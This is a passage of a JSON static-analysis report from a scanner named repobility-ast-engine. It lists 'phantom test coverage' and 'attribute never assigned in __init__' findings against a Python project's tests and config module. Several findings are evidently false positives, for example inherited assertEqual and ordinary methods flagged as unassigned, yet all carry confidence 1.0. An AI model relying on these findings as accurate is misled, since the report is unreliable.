"repobility-ast-engine", "correlation_key": "fp|74f56bf7ed9fa3f057f5165a339636662afd3fd518190d9e304d4c97c3378d0d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_tasks_core.py"}, "region": {"startLine": 157}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_import_rules"}, "properties": {"repobilityId": 46409, "scanner": "repobility-ast-engine", "fingerprint": "750524d723b10276ac26001fb138ad9cdf3c9fbcbe442aa0ae1edc3540ad62e7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|750524d723b10276ac26001fb138ad9cdf3c9fbcbe442aa0ae1edc3540ad62e7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_permission_system.py"}, "region": {"startLine": 65}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_import_modes"}, "properties": {"repobilityId": 46408, "scanner": "repobility-ast-engine", "fingerprint": "92cdc075980a576b75443678e5bc48c8be4a3f8f0b9d1794106677b3d5ef429a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|92cdc075980a576b75443678e5bc48c8be4a3f8f0b9d1794106677b3d5ef429a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_permission_system.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_bare_mode_disables"}, "properties": {"repobilityId": 46407, "scanner": "repobility-ast-engine", "fingerprint": "4bb44fcbfac41582da0caf5b5e40237036cd018b43366c52a0a1f20341c8947e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4bb44fcbfac41582da0caf5b5e40237036cd018b43366c52a0a1f20341c8947e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_md.py"}, "region": {"startLine": 290}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_cache_clearing"}, "properties": {"repobilityId": 46406, "scanner": "repobility-ast-engine", "fingerprint": "b693cce5aa1814346a926bdafc907f1ce531c0f4f4c67b995b58cfae856c0790", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b693cce5aa1814346a926bdafc907f1ce531c0f4f4c67b995b58cfae856c0790"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_md.py"}, "region": {"startLine": 278}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_manifest"}, "properties": {"repobilityId": 46405, "scanner": "repobility-ast-engine", "fingerprint": "adfcbbebbab2699e6c1b007d112ff29d62d4ec29c6ff2f1224926d00da29046e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|adfcbbebbab2699e6c1b007d112ff29d62d4ec29c6ff2f1224926d00da29046e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_plugin_loader.py"}, "region": {"startLine": 79}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_json"}, "properties": {"repobilityId": 46404, "scanner": "repobility-ast-engine", "fingerprint": "17998fa84184cb359759fb9b4b712084f8522656a8f13e400d7a5638b0f6eabf", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|17998fa84184cb359759fb9b4b712084f8522656a8f13e400d7a5638b0f6eabf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_plugin_loader.py"}, "region": {"startLine": 72}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_missing_manifest"}, "properties": {"repobilityId": 46403, "scanner": "repobility-ast-engine", "fingerprint": "3a96bcaf775ae14b2dd55dc4e087873a51e0d3c36e4c97fd4a98dba2dcc5f47e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3a96bcaf775ae14b2dd55dc4e087873a51e0d3c36e4c97fd4a98dba2dcc5f47e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_plugin_loader.py"}, "region": {"startLine": 66}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_preconnect_does_not_raise_on_network_error"}, "properties": {"repobilityId": 46402, "scanner": "repobility-ast-engine", "fingerprint": "5489d3dd3b5190d43bdd0a1ef02e5c2a9c145c113e515df61c1f54bda4f6878e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5489d3dd3b5190d43bdd0a1ef02e5c2a9c145c113e515df61c1f54bda4f6878e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_api_preconnect.py"}, "region": {"startLine": 142}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_cli_module_import_populates_prefetch_handles"}, "properties": {"repobilityId": 46401, "scanner": "repobility-ast-engine", "fingerprint": "b397f9b6a70fd1914ffb0bb71b41d1a2cf1c92a0766b22f92d679c90d5e42c3e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b397f9b6a70fd1914ffb0bb71b41d1a2cf1c92a0766b22f92d679c90d5e42c3e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_prefetch.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_disarm_after_fire_is_safe"}, "properties": {"repobilityId": 46400, "scanner": "repobility-ast-engine", "fingerprint": "d3ecfc2d6d0b08692e7a127f12e0e1d7470730e8b9a41233d3fb9f3d135a5c52", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d3ecfc2d6d0b08692e7a127f12e0e1d7470730e8b9a41233d3fb9f3d135a5c52"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_stream_watchdog.py"}, "region": {"startLine": 101}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_returns_none_when_no_managed_file"}, "properties": {"repobilityId": 46399, "scanner": "repobility-ast-engine", "fingerprint": "a38c061f00fecf3e37c7fab7cf1c57ab861f37f8897eac8e76a7e807399cd18f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a38c061f00fecf3e37c7fab7cf1c57ab861f37f8897eac8e76a7e807399cd18f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_settings.py"}, "region": {"startLine": 160}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_clear_is_safe_when_prompt_assembly_unavailable"}, "properties": {"repobilityId": 46398, "scanner": "repobility-ast-engine", "fingerprint": "1f765fb522b909f0f9002d78a13800ead23712bf8d7c6019e1f41094cde568db", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1f765fb522b909f0f9002d78a13800ead23712bf8d7c6019e1f41094cde568db"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_clear_system_prompt_sections.py"}, "region": {"startLine": 57}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_pre_aborted_signal_short_circuits_before_request"}, "properties": {"repobilityId": 46397, "scanner": "repobility-ast-engine", "fingerprint": "c3448b5fe76758ba9041a1610fe1449435171a8b3ac68e5b1bdc1b39825c4902", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c3448b5fe76758ba9041a1610fe1449435171a8b3ac68e5b1bdc1b39825c4902"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_provider_abort_signal.py"}, "region": {"startLine": 105}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.root` used but never assigned in __init__"}, "properties": {"repobilityId": 46396, "scanner": "repobility-ast-engine", "fingerprint": "95ca1abcd0c26f0b1e0247b627ad31afcf60c4f041eb5f4cb4e291fbefccb681", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|95ca1abcd0c26f0b1e0247b627ad31afcf60c4f041eb5f4cb4e291fbefccb681"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 115}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.tmp` used but never assigned in __init__"}, "properties": {"repobilityId": 46395, "scanner": "repobility-ast-engine", "fingerprint": "f34ce65005de9dc57604b853d5aedadb23e0b4e8bbc86c6bc88ac5542440f679", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|f34ce65005de9dc57604b853d5aedadb23e0b4e8bbc86c6bc88ac5542440f679"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 111}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.tmp` used but never assigned in __init__"}, "properties": {"repobilityId": 46394, "scanner": "repobility-ast-engine", "fingerprint": "79e1d99fd411b8420a4be0abb22b04d51f80d3a9f228190386165453943490d4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|79e1d99fd411b8420a4be0abb22b04d51f80d3a9f228190386165453943490d4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 108}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.root` used but never assigned in __init__"}, "properties": {"repobilityId": 46393, "scanner": "repobility-ast-engine", "fingerprint": "aa2f8714a347354256b3de3dc76a8d80b70240feca57f732dbadee1fb16eb501", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|aa2f8714a347354256b3de3dc76a8d80b70240feca57f732dbadee1fb16eb501"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 108}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.tmp` used but never assigned in __init__"}, "properties": {"repobilityId": 46392, "scanner": "repobility-ast-engine", "fingerprint": "7b84afc988f98de3ef9c12f66ee25ef48022cc05250a9a9437ca4262e2dfb44f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|7b84afc988f98de3ef9c12f66ee25ef48022cc05250a9a9437ca4262e2dfb44f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 107}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46391, "scanner": "repobility-ast-engine", "fingerprint": "99ce0a4f6f10b72e1d10c6ddb464a5f712adb378239461dfb873a7c2f3b64ac2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|99ce0a4f6f10b72e1d10c6ddb464a5f712adb378239461dfb873a7c2f3b64ac2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 100}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46390, "scanner": "repobility-ast-engine", "fingerprint": "03182211579247b56adce97120481df503386694c088698b56bc6441516a3e7f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|03182211579247b56adce97120481df503386694c088698b56bc6441516a3e7f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 96}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46389, "scanner": "repobility-ast-engine", "fingerprint": "e36a266f754a6f98afb9489cd3a20e2066eb530b86eb4a7443d8c45b79a5b864", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e36a266f754a6f98afb9489cd3a20e2066eb530b86eb4a7443d8c45b79a5b864"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46388, "scanner": "repobility-ast-engine", "fingerprint": "905764ca7d489bdb055e09aa1dc8463b223a0272ce138600553a1ba74e564154", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|905764ca7d489bdb055e09aa1dc8463b223a0272ce138600553a1ba74e564154"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 94}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46387, "scanner": "repobility-ast-engine", "fingerprint": "d3d67cc12b175ca6f15888966f74e80a396e10f73b67a15e02d39f2ccc647152", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d3d67cc12b175ca6f15888966f74e80a396e10f73b67a15e02d39f2ccc647152"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46386, "scanner": "repobility-ast-engine", "fingerprint": "628de10c05745096fea3e8ef8e19dbadbee1bbe00498dffa8de0fe43e55e6702", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|628de10c05745096fea3e8ef8e19dbadbee1bbe00498dffa8de0fe43e55e6702"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 83}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46385, "scanner": "repobility-ast-engine", "fingerprint": "4bfa84f88cf41fbcdb9152854f81e319c16113d910bdf04cd41221c29f1b1942", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4bfa84f88cf41fbcdb9152854f81e319c16113d910bdf04cd41221c29f1b1942"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 77}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46384, "scanner": "repobility-ast-engine", "fingerprint": "b5329144ec34dd5e22fa06e2e8048444236baa1a5acff57c4b1f3154ab92da2f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b5329144ec34dd5e22fa06e2e8048444236baa1a5acff57c4b1f3154ab92da2f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 71}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46383, "scanner": "repobility-ast-engine", "fingerprint": "7eb24e530b43750ab96e40b00435383f9f97c5d2949d7673302e21c222f61bc7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|7eb24e530b43750ab96e40b00435383f9f97c5d2949d7673302e21c222f61bc7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 65}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46382, "scanner": "repobility-ast-engine", "fingerprint": "cf35cdb4abd5d314c0877ee091a44ca4888823a030845617a0e2981a40966baf", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|cf35cdb4abd5d314c0877ee091a44ca4888823a030845617a0e2981a40966baf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 59}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.assertEqual` used but never assigned in __init__"}, "properties": {"repobilityId": 46381, "scanner": "repobility-ast-engine", "fingerprint": "122618009cb057f2f3083eb33ced2497498370640b4f4d712e9bc2d11da98340", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|122618009cb057f2f3083eb33ced2497498370640b4f4d712e9bc2d11da98340"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_image_processor.py"}, "region": {"startLine": 53}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.all` used but never assigned in __init__"}, "properties": {"repobilityId": 46377, "scanner": "repobility-ast-engine", "fingerprint": "95ee81fddfcb2c2cbda2d9aa2c9195771ca996dcc1e3ae9ba3f464b641f2720b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|95ee81fddfcb2c2cbda2d9aa2c9195771ca996dcc1e3ae9ba3f464b641f2720b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/task_registry.py"}, "region": {"startLine": 114}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.save_project` used but never assigned in __init__"}, "properties": {"repobilityId": 46371, "scanner": "repobility-ast-engine", "fingerprint": "ace88e84e898a066de7c1ee5c3cff088b8dbe3566bfb3b181e890a426535bb50", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ace88e84e898a066de7c1ee5c3cff088b8dbe3566bfb3b181e890a426535bb50"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 226}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.load_project` used but never assigned in __init__"}, "properties": {"repobilityId": 46370, "scanner": "repobility-ast-engine", "fingerprint": "8058e9e3bb9956b0fe06a709ab1e883bed9cda3b1e8c8902b19d054e4f8e9262", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8058e9e3bb9956b0fe06a709ab1e883bed9cda3b1e8c8902b19d054e4f8e9262"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 224}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.save_global` used but never assigned in __init__"}, "properties": {"repobilityId": 46369, "scanner": "repobility-ast-engine", "fingerprint": "74ff74fc4c9745d860764d35c96424029bb8300ff9ef58d04586422a0b0be910", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|74ff74fc4c9745d860764d35c96424029bb8300ff9ef58d04586422a0b0be910"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 221}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.load_global` used but never assigned in __init__"}, "properties": {"repobilityId": 46368, "scanner": "repobility-ast-engine", "fingerprint": "132f23abe11dbc4e5a385c1bac0b8ca3ec2b09a014a8a814e42bbd41bcd6ea8a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|132f23abe11dbc4e5a385c1bac0b8ca3ec2b09a014a8a814e42bbd41bcd6ea8a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 219}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.get_merged` used but never assigned in __init__"}, "properties": {"repobilityId": 46367, "scanner": "repobility-ast-engine", "fingerprint": "cd0ea5d041d7729288d8be668c23c3ca3d867237512ded473d301a129cd6af72", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|cd0ea5d041d7729288d8be668c23c3ca3d867237512ded473d301a129cd6af72"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 216}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.load_local` used but never assigned in __init__"}, "properties": {"repobilityId": 46366, "scanner": "repobility-ast-engine", "fingerprint": "8617f470d272e6801b448e1c48dc852020ad0d830c2431cf2c3dfeaeef01bff0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8617f470d272e6801b448e1c48dc852020ad0d830c2431cf2c3dfeaeef01bff0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 190}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.load_project` used but never assigned in __init__"}, "properties": {"repobilityId": 46365, "scanner": "repobility-ast-engine", "fingerprint": "91c65fdc71baa502fa1140c42c60c69c67c63e0b149b2e3406176da29125e704", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|91c65fdc71baa502fa1140c42c60c69c67c63e0b149b2e3406176da29125e704"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 189}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.load_global` used but never assigned in __init__"}, "properties": {"repobilityId": 46364, "scanner": "repobility-ast-engine", "fingerprint": "077e330b79c50ab2d86b3ed34f64db1c3129e5a92ff58c30361c05d29a265cdb", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": 